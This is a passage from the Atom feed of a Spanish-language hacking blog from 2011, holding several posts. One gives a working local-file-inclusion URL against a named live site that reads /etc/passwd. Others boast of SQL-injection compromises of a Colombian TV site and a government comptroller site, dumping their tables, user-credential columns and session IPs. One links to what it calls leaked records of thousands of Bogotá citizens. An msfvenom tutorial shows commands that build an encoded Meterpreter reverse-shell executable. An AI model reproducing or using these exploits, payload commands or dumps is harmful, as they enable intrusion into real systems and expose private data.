&lt;b&gt;EJEMPLO REAL:&amp;nbsp;&lt;a href="http://www.europeancartransport.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&amp;amp;spo_f_email%20=sample@email.tst&amp;amp;spo_message=20&amp;amp;spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&amp;amp;spo_send_type=&amp;amp;spo_site_lang=../../../../../../../../../../etc/passwd&amp;amp;spo_site_name=Alfredo%20Arauz&amp;amp;spo_url_type=1&amp;amp;spo_url2se"&gt;http://www.europeancartransport.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&amp;amp;spo_f_email =sample@email.tst&amp;amp;spo_message=20&amp;amp;spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&amp;amp;spo_send_type=&amp;amp;spo_site_lang=../../../../../../../../../../etc/passwd&amp;amp;spo_site_name=Alfredo%20Arauz&amp;amp;spo_url_type=1&amp;amp;spo_url2se&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
El NullByte es junto pero blogger no me deja ponerlo el error es en la variable:&lt;br /&gt;
&lt;pre class="brush: javascript"&gt;spo_site_lang=&lt;/pre&gt;&lt;br /&gt;
&lt;b&gt;Fuente:&amp;nbsp;&lt;a href="http://seguridadblanca.blogspot.com/2011/07/simple-page-option-lfi.html"&gt;Seguridad Blanca&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-5899572612010029537?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KtVwK0zT8rjSrs-aFwcXioCMZ38/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KtVwK0zT8rjSrs-aFwcXioCMZ38/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KtVwK0zT8rjSrs-aFwcXioCMZ38/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KtVwK0zT8rjSrs-aFwcXioCMZ38/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/ywPTrUS5RhA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/5899572612010029537/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/simple-page-option-lfi-module-joomla.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5899572612010029537?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5899572612010029537?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/ywPTrUS5RhA/simple-page-option-lfi-module-joomla.html" title="SIMPLE PAGE OPTION LFI MODULE JOOMLA" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/simple-page-option-lfi-module-joomla.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQAQHY4cSp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-3990283202984345683</id><published>2011-07-13T22:33:00.000-07:00</published><updated>2011-12-08T20:52:21.839-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:52:21.839-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><title>AGÜITA PARA MI GENTE! #OWNED!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.jorgebarontelevision.com.co/sitioconsolas/images/paginas/070803030818foto-jorgebaron.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.jorgebarontelevision.com.co/sitioconsolas/images/paginas/070803030818foto-jorgebaron.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;TABLAS:&lt;/b&gt;&lt;br /&gt;
&lt;pre class='brush: javascript'&gt;information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLLATION_CHARACTER_SET_APPLICABILITY
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.PROFILING
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLE_PRIVILEGES
information_schema.TRIGGERS
information_schema.USER_PRIVILEGES
information_schema.VIEWS
jbtv.swinf41tblarchivos
jbtv.swinf41tblbanners
jbtv.swinf41tblcategorias
jbtv.swinf41tblcomentarios
jbtv.swinf41tblconsolas
jbtv.swinf41tblcontactos
jbtv.swinf41tbldescargas
jbtv.swinf41tblencuesta
jbtv.swinf41tblmodulos
jbtv.swinf41tblnoticias
jbtv.swinf41tblprogramas
jbtv.swinf41tblrelaciones
jbtv.swinf41tblrespuestas
jbtv.swinf41tblshows
jbtv.swinf41tblsitiosvisitados
jbtv.swinf41tblusuarios
jbtv.swinf41tblvideos&lt;/pre&gt;&lt;br /&gt;
&lt;b&gt;Tabla:&lt;/b&gt; jbtv.swinf41tblusuarios&lt;br /&gt;
&lt;pre class='brush: javascript'&gt;idusuario
strnombre
strcargo
strlogin
strclave
idactivo
idperfil
dsfoto
dsprof
dscom
dscorreo
idusuario
strnombre
strcargo
strlogin
strclave
idactivo
idperfil
dsfoto
dsprof
dscom
dscorreo
id
seccion
campo1
campo2
campo3
campo4
campo5
campo6
campo8
tipo
tema
activar
intpos&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-3990283202984345683?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nw9IEfR3iHrkM7cBq01AdU0R-Go/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nw9IEfR3iHrkM7cBq01AdU0R-Go/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nw9IEfR3iHrkM7cBq01AdU0R-Go/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nw9IEfR3iHrkM7cBq01AdU0R-Go/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/ki8VHzeXIqQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/3990283202984345683/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/aguita-para-mi-gente-owned.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3990283202984345683?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3990283202984345683?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/ki8VHzeXIqQ/aguita-para-mi-gente-owned.html" title="AGÜITA PARA MI GENTE! #OWNED!" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/aguita-para-mi-gente-owned.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQDQHc_fSp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-7166944462907825847</id><published>2011-07-12T22:14:00.000-07:00</published><updated>2011-12-08T20:52:51.945-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:52:51.945-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="Reporte" /><title>MILES DE DATOS CIUDADANOS DE BOGOTA</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://harry.ichotebor.cz/bobtailharry/disclosure.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="137" src="http://harry.ichotebor.cz/bobtailharry/disclosure.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;a href="https://docs.google.com/viewer?a=v&amp;amp;pid=explorer&amp;amp;chrome=true&amp;amp;srcid=0B7FJ_rxyScaZOTU2YWVhZGQtYzBiYi00MjE0LTk5OWMtNzU2MjZmMGI4YjMx&amp;amp;hl=es"&gt;INSCRITOS SENA 2009-2010.pdf - 186 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZZTNhMTMyZjctNGNmYi00MDE2LWE3MDktZGMxNTBlNzlmOGVh&amp;amp;hl=es"&gt;2007-2008.xls - 998 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZNDFkOGJjODYtZmVjMy00OTUxLTk3YzctZmU4YjcxZmRiY2Q1&amp;amp;hl=es"&gt;2007_2009.xls - 998 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZMzBiNTQ4ZDItNmEwNi00M2UxLWE4NTAtODY0ODE3YTJlZjUx&amp;amp;hl=es"&gt;01 personas vinculadas a capacitacion junio 2007 a junio 2008.xlsx - 4121 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZNjFkYjg0MzktYzViNC00ZmU5LTgyOGQtM2FlMzAzNGRmMzIz&amp;amp;hl=es"&gt;02 personas vinculadas a capacitacion julio 2008 a julio 2009.xlsx - 1635 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZNWZjY2M4MWUtZGY1Yy00ZGM0LWI2NjUtY2IzZjRkMDljN2Iz&amp;amp;hl=es"&gt;03 personas vinculadas a capacitacion agosto a diciembre 2009.xlsx - 44 Registros&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZOTU1ODYyN2YtMjU2Yi00NDc2LTgzYTEtMDZkMDI4OGNlMTAx&amp;amp;hl=es"&gt;Representantes REDEP.xls&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-7166944462907825847?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4AGXr7w0XPgE0sJo6OqLnwglOqM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4AGXr7w0XPgE0sJo6OqLnwglOqM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4AGXr7w0XPgE0sJo6OqLnwglOqM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4AGXr7w0XPgE0sJo6OqLnwglOqM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/mVFhiwjXt84" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/7166944462907825847/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/miles-de-datos-ciudadanos-de-bogota.html#comment-form" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7166944462907825847?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7166944462907825847?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/mVFhiwjXt84/miles-de-datos-ciudadanos-de-bogota.html" title="MILES DE DATOS CIUDADANOS DE BOGOTA" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/miles-de-datos-ciudadanos-de-bogota.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQMQngzfyp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-6689553184244375517</id><published>2011-07-08T16:36:00.000-07:00</published><updated>2011-12-08T20:53:03.687-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:53:03.687-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit Framework" /><title>METASPLOIT MSFVenom</title><content type="html">&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Dp5E3wWX9z4/ThQFv94xX-I/AAAAAAAAAlA/qKK7PtOyHoQ/s1600/sm3venom-grande.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-Dp5E3wWX9z4/ThQFv94xX-I/AAAAAAAAAlA/qKK7PtOyHoQ/s320/sm3venom-grande.jpg" width="268" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;$ ./msfvenom&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Hace unas semanas, durante una de mis actualizaciones del Metasploit Framework ví aparecer un nuevo comando llamado &lt;b&gt;"msfvenom"&lt;/b&gt;. No había leído nada en el blog de Metasploit ni en ningún otro lado, pero con ese nombre tenía que ser algo bueno, así que miré la ayuda del comando a ver si averiguaba que hacía el nuevo jueguete:&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://www.hack4fun.eu/wp-content/uploads/2011/05/msfvenom.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="260" src="http://www.hack4fun.eu/wp-content/uploads/2011/05/msfvenom.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;$ ./msfvenom --help&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Visto lo visto, y después de jugar un rato, podemos decir que &lt;b&gt;"msfvenom"&lt;/b&gt; simplemente es una unificación de los binarios &lt;b&gt;"msfpayload"&lt;/b&gt; y &lt;b&gt;"msfencode"&lt;/b&gt; que todos hemos utilizado para generar payloads de Metasploit para que funcionen de forma independiente, o para importarlos en nuestros exploits fuera del framework, y cifrarlo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por hacer un repaso, hasta ahora, si quisiéramo generar un Payload de tipo Meterpreter para Windows y encodearlo con 10 iteraciones de alguno de los algoritmos, tendríamos que llamar a msfpayload señalando la salida como Raw, y concatenar esta con msfencode:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="brush: ruby"&gt;#
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -o meterpreter.exe
#&lt;/pre&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Ahora, con el nuevo comando, sería lo mismo, pero sin tener que usar tuberías ni elegir formato Raw primero:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="brush: ruby"&gt;#
$ ./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 LHOST=192.168.1.100 &amp;gt; meterpreter.exe
#&lt;/pre&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Por lo demás, usaríamos este binario de su forma habitual, y por supuesto tiene muchas más opciones para elegir patrones diferentes para crear los binarios, igual que sucedía con &lt;b&gt;"msfpayload"&lt;/b&gt; y &lt;b&gt;"msfencode"&lt;/b&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="http://www.pentester.es/"&gt;Pentester.es&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-6689553184244375517?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/cYflE1xNyR-y9Mcz8Bcbt_B6t4U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cYflE1xNyR-y9Mcz8Bcbt_B6t4U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/cYflE1xNyR-y9Mcz8Bcbt_B6t4U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cYflE1xNyR-y9Mcz8Bcbt_B6t4U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/ORCbb7qLCaY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/6689553184244375517/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/metasploit-msfvenom.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/6689553184244375517?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/6689553184244375517?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/ORCbb7qLCaY/metasploit-msfvenom.html" title="METASPLOIT MSFVenom" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Dp5E3wWX9z4/ThQFv94xX-I/AAAAAAAAAlA/qKK7PtOyHoQ/s72-c/sm3venom-grande.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/metasploit-msfvenom.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0IER3g9eSp7ImA9WhdTEUg.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4400903473194683703</id><published>2011-07-08T11:58:00.000-07:00</published><updated>2011-07-08T11:58:26.661-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-08T11:58:26.661-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><title>iSQL en contraloriadelatlantico.gov.co</title><content type="html">&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://www.asamblea.atlantico.gov.co/imagenes_atlantico/logos/contraloria.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="146" src="http://www.asamblea.atlantico.gov.co/imagenes_atlantico/logos/contraloria.gif" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;i&gt;Contraloria Departamental del Atlantico&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Tablas:&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush: sql"&gt;titulares 
resoluciones 
portada 
novedades 
noticias 
normatividad 
municipios 
modalidad 
juiciosderesponsabilidad 
invitaciones 
galeria 
gal_titulos 
entidad 
cursos 
cotizaciones 
controles 
contratos 
contenido 
clase_contrato 
cda_sesiones 
auditorias&lt;/pre&gt;&lt;br /&gt;
&lt;b&gt;Tabla:&lt;/b&gt; cda_sesiones.&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: verdana; font-size: 12px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFCE" nowrap="" style="font-family: verdana;"&gt;&lt;b&gt;&lt;span style="color: #dc883d; font-size: x-small;"&gt;IP&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFCE" nowrap="" style="font-family: verdana;"&gt;&lt;b&gt;&lt;span style="color: #dc883d; font-size: x-small;"&gt;FechaHora&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFCE" nowrap="" style="font-family: verdana;"&gt;&lt;b&gt;&lt;span style="color: #dc883d; font-size: x-small;"&gt;ID_Usuario&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFCE" nowrap="" style="font-family: verdana;"&gt;&lt;b&gt;&lt;span style="color: #dc883d; font-size: x-small;"&gt;ID_Session&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-26 09:58:03&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;12&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-26 10:17:05&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;13&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-26 10:25:14&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;14&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-26 10:56:59&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;15&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-27 09:42:06&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;16&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-27 10:03:04&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;17&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-27 10:25:25&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;18&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
